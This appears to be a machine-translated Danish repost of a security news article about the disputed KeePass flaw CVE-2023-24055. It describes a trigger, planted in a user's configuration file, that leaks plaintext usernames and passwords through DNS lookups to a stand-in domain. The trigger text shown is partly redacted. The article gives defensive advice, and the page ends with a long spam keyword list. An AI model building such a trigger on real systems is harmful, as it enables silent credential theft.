Det har været nogle nyhedsværdige uger for adgangskodeadministratorer – de praktiske værktøjer, der hjælper dig med at finde en anden adgangskode til hver hjemmeside, du bruger, og derefter holde styr på dem alle.
I slutningen af 2022 var det LastPass' tur til at være med i nyhederne, da virksomheden endelig indrømmede, at et brud, det led tilbage i august 2022, faktisk endte med kundernes adgangskode hvælvinger bliver stjålet fra skytjenesten, hvor de blev sikkerhedskopieret.
(Selve adgangskoderne blev ikke stjålet, fordi boksene var krypteret, og LastPass havde ikke kopier af nogens "hovednøgle" til selve backup-hvælvingsfilerne, men det var en tættere barbering, end de fleste var glade for at høre.)
Så var det LifeLocks tur til at være med i nyhederne, da virksomheden advarede om, hvad der lignede et udslæt af password gætte angreb, sandsynligvis baseret på adgangskoder stjålet fra en helt anden hjemmeside, muligvis for noget tid siden, og måske købt på det mørke web for nylig.
LifeLock selv var ikke blevet brudt, men nogle af dets brugere havde, takket være adgangskodedelingsadfærd forårsaget af risici, de måske ikke engang huskede at have taget.
Konkurrenterne 1Password og BitWarden har også været i nyhederne for nylig, baseret på rapporter om ondsindede annoncer, tilsyneladende uforvarende udsendt af Google, som overbevisende lokkede brugere til at kopiere logon-sider med det formål at phishe deres kontooplysninger.
Nu er det KeePass' tur til at være det i nyhederne, denne gang for endnu et cybersikkerhedsproblem: et påstået sårbarhed, jargonbegrebet, der bruges til softwarefejl, der fører til cybersikkerhedshuller, som angribere muligvis kan udnytte til onde formål.
Det er nemt at sniffe adgangskoder
Vi omtaler det som en sårbarhed her, fordi den har en officiel fejlidentifikator, udstedt af US National Institute for Standards and Technology.
Fejlen er blevet døbt CVE-2023-24055: Angriber, der har skriveadgang til XML-konfigurationsfilen, [kan] få klartekstadgangskoderne ved at tilføje en eksporttrigger.
Påstanden om at kunne få klartekst-adgangskoder er desværre sand.
Hvis jeg har skriveadgang til dine personlige filer, herunder dine såkaldte %APPDATA%
mappe, kan jeg snigende justere konfigurationssektionen for at ændre eventuelle KeePass-indstillinger, som du allerede har tilpasset, eller for at tilføje tilpasninger, hvis du ikke bevidst har ændret noget...
…og jeg kan overraskende nemt stjæle dine plaintext-adgangskoder, enten i bulk, for eksempel ved at dumpe hele databasen som en ukrypteret CSV-fil, eller som du bruger dem, for eksempel ved at sætte en "programhook", der udløses, hver gang du tilgår en adgangskode fra databasen.
Bemærk, at jeg ikke har brug for Administrator privilegier, fordi jeg ikke behøver at rode med selve installationsmappen, hvor KeePass-appen bliver gemt, hvilket typisk er forbudt for almindelige brugere
Og jeg har ikke brug for adgang til nogen låste globale konfigurationsindstillinger.
Interessant nok går KeePass ud af sin måde at forhindre, at dine adgangskoder bliver opsnuset, når du bruger dem, herunder at bruge teknikker til beskyttelse mod manipulation for at stoppe forskellige anti-keylogger-tricks, selv fra brugere, der allerede har sysadmin-beføjelser.
Men KeePass-softwaren gør det også overraskende nemt at indfange plaintext-adgangskodedata, måske på måder, som du måske finder "for let", selv for ikke-administratorer.
Det var et minuts arbejde at bruge KeePass GUI til at skabe en Udløser hændelse til at køre hver gang du kopierer en adgangskode til udklipsholderen, og for at sætte hændelsen til at lave et DNS-opslag, der indeholdt både brugernavnet og det pågældende plaintext password:
Vi kunne så kopiere den ikke voldsomt indlysende XML-indstilling for den mulighed ud af vores egen lokale konfigurationsfil til konfigurationsfilen for en anden bruger på systemet, hvorefter de også ville opdage, at deres adgangskoder blev lækket over internettet via DNS-opslag.
Selvom XML-konfigurationsdataene stort set er læsbare og informative, bruger KeePass nysgerrigt tilfældige datastrenge kendt som GUID'er (forkortelse for globalt unikke identifikatorer) for at betegne de forskellige Udløser indstillinger, så selv en velinformeret bruger har brug for en omfattende referenceliste for at give mening om, hvilke triggere der er indstillet, og hvordan.
Her er, hvordan vores DNS-lækkende trigger ser ud, selvom vi har redigeret nogle af detaljerne, så du ikke kan komme op i noget umiddelbart fortræd blot ved at kopiere-og-indsætte denne tekst direkte:
XXXXXXXXXXXXXXXXXXXXX Kopi Stjæl ting via DNS-opslag XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nsopslag XXXXX.XXXXXX.blah.test Sand 1
Når denne trigger er aktiv, får adgang til en KeePass-adgangskode klarteksten til at lække ud i et diskret DNS-opslag til et domæne efter mit valg, som er blah.test
i dette eksempel.
Bemærk, at angribere fra det virkelige liv næsten helt sikkert ville forvrænge eller tilsløre den stjålne tekst, hvilket ikke kun ville gøre det sværere at opdage, hvornår DNS-lækager fandt sted, men også tage sig af adgangskoder, der indeholder ikke-ASCII-tegn, såsom bogstaver med accent eller emojis, som ellers ikke kan bruges i DNS-navne:
Men er det virkelig en fejl?
Det vanskelige spørgsmål er dog, "Er dette virkelig en fejl, eller er det bare en kraftfuld funktion, der kunne misbruges af en person, der allerede ville have brug for mindst lige så meget kontrol over dine private filer, som du selv har?"
Kort sagt, er det en sårbarhed, hvis nogen, der allerede har kontrol over din konto, kan rode med filer, som din konto formodes at kunne få adgang til alligevel?
Selvom du måske håber, at en pssword-manager vil inkludere masser af ekstra lag af manipulationsbeskyttelse for at gøre det sværere for fejl/funktioner af denne slags at blive misbrugt, bør CVE-2023-24055 virkelig være en CVE-listet sårbarhed?
Hvis ja, ville kommandoer som f.eks DEL
(slet en fil) og FORMAT
skal også være "bugs"?
Og ville selve eksistensen af PowerShell, som gør potentielt farlig adfærd meget nemmere at fremprovokere (prøv powerhsell get-clipboard
for eksempel), være en sårbarhed i sig selv?
Det er KeePass' holdning, anerkendt af følgende tekst, der er blevet tilføjet til "bug" detalje på NISTs hjemmeside:
** DISPUTERT ** […] BEMÆRK: Leverandørens holdning er, at adgangskodedatabasen ikke er beregnet til at være sikker mod en hacker, der har det niveau af adgang til den lokale pc.
Hvad skal jeg gøre?
Hvis du er en selvstændig KeePass-bruger, kan du tjekke for useriøse triggere som "DNS-stealeren", vi oprettede ovenfor ved at åbne KeePass-appen og gennemse Værktøjer > Udløser... vindue:
Bemærk, at du kan vende det hele Udløser system fra dette vindue, blot ved at fravælge [ ] Enable trigger system
mulighed…
…men det er ikke en global indstilling, så den kan slås til igen via din lokale konfigurationsfil og beskytter dig derfor kun mod fejl, snarere end mod en hacker med adgang til din konto.
Du kan tvinge indstillingen fra for alle på computeren, uden mulighed for, at de selv kan slå den til igen, ved at ændre den globale "lockdown"-fil KeePass.config.enforced.XML
, findes i den mappe, hvor selve app-programmet er installeret.
Udløsere vil blive tvunget fra for alle, hvis din globale XML-håndhævelsesfil ser sådan ud:
falsk
(Hvis du undrer dig, vil en angriber, der har skriveadgang til applikationsbiblioteket for at vende denne ændring, næsten helt sikkert have kraft nok på systemniveau til at ændre selve KeePass eksekverbare fil eller til at installere og aktivere en selvstændig keylogger alligevel.)
Hvis du er netværksadministrator, der har til opgave at låse KeePass ned på dine brugeres computere, så det stadig er fleksibelt nok til at hjælpe dem, men ikke fleksibelt nok til, at de ved en fejl kan hjælpe cyberkriminelle, anbefaler vi at læse KeePass Sikkerhedsproblemer side, den Udløser side, og Tvungen konfiguration .
- SEO Powered Content & PR Distribution. Bliv forstærket i dag.
- Platoblokkæde. Web3 Metaverse Intelligence. Viden forstærket. Adgang her.
- Kilde: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- I stand
- Om
- over
- absolutte
- adgang
- Adgang
- Konto
- aktiv
- tilføjet
- indrømmede
- annoncer
- Efter
- mod
- Alle
- påståede
- allerede
- ,
- En anden
- app
- Anvendelse
- AUGUST
- forfatter
- auto
- tilbage
- Backed
- background-billede
- backup
- baseret
- fordi
- være
- grænse
- Bund
- brud
- Bug
- bugs
- fange
- hvilken
- tilfælde
- forårsagede
- årsager
- center
- sikkert
- lave om
- tegn
- kontrollere
- valg
- krav
- tættere
- Cloud
- farve
- Kom
- selskab
- fuldstændig
- computer
- computere
- betingelser
- Konfiguration
- Overvej
- kontrol
- kopier
- kunne
- dæksel
- skabe
- oprettet
- CVE
- cyberkriminelle
- Cybersecurity
- Dangerous
- mørk
- Mørk Web
- data
- Database
- detaljer
- DID
- forskellige
- direkte
- Skærm
- dns
- domæne
- Dont
- ned
- døbt
- lettere
- nemt
- enten
- krypteret
- håndhævelse
- nok
- Hele
- Endog
- begivenhed
- Hver
- alle
- eksempel
- Exploit
- eksport
- omfattende
- ekstra
- Feature
- få
- File (Felt)
- Filer
- Endelig
- Finde
- fleksibel
- efter
- Tving
- fundet
- fra
- få
- få
- Global
- Goes
- praktisk
- Gem
- have
- højde
- hjælpe
- link.
- Huller
- håber
- hover
- Hvordan
- Men
- HTML
- HTTPS
- identifikator
- umiddelbar
- in
- omfatter
- medtaget
- Herunder
- informative
- installere
- instans
- Institut
- Internet
- spørgsmål
- Udstedt
- IT
- selv
- jargon
- Holde
- kendt
- vid udstrækning
- LastPass
- lag
- føre
- lække
- Lækager
- Niveau
- Liste
- lokale
- kiggede
- UDSEENDE
- kig op
- lavet
- lave
- maerker
- leder
- Ledere
- Margin
- max-bredde
- måske
- fejltagelse
- fejl
- ændre
- mest
- navne
- national
- Behov
- netværk
- nyheder
- NIST
- normal
- opnå
- officiel
- åbning
- Option
- Ellers
- egen
- parameter
- Adgangskode
- Nulstilling/ændring af adgangskoder
- paul
- PC
- Mennesker
- måske
- personale
- Phishing
- Simpel tekst
- plato
- Platon Data Intelligence
- PlatoData
- position
- Indlæg
- potentielt
- magt
- vigtigste
- beføjelser
- PowerShell
- private
- privilegier
- sandsynligvis
- Program
- købt
- formål
- sætte
- spørgsmål
- tilfældig
- udslæt
- Læsning
- for nylig
- anbefaler
- fast
- huske
- svar
- rapporteret
- Rapporter
- vende
- risici
- Kør
- Sektion
- sikker
- forstand
- tjeneste
- sæt
- indstilling
- indstillinger
- Kort
- bør
- ganske enkelt
- So
- Software
- solid
- nogle
- Nogen
- Spot
- standalone
- standarder
- Stadig
- stjålet
- Stands
- opbevaret
- sådan
- formodes
- SVG
- systemet
- Tag
- teknikker
- Teknologier
- deres
- selv
- derfor
- Gennem
- tid
- til
- også
- top
- spor
- overgang
- gennemsigtig
- udløse
- sand
- TUR
- Drejede
- typisk
- enestående
- URL
- us
- brug
- Bruger
- brugere
- forsyningsselskaber
- forskellige
- Vault
- hvælvinger
- via
- sårbarhed
- W3
- måder
- web
- Hjemmeside
- uger
- Hvad
- som
- WHO
- vilje
- undrende
- Arbejde
- ville
- skriver
- XML
- Din
- dig selv
- zephyrnet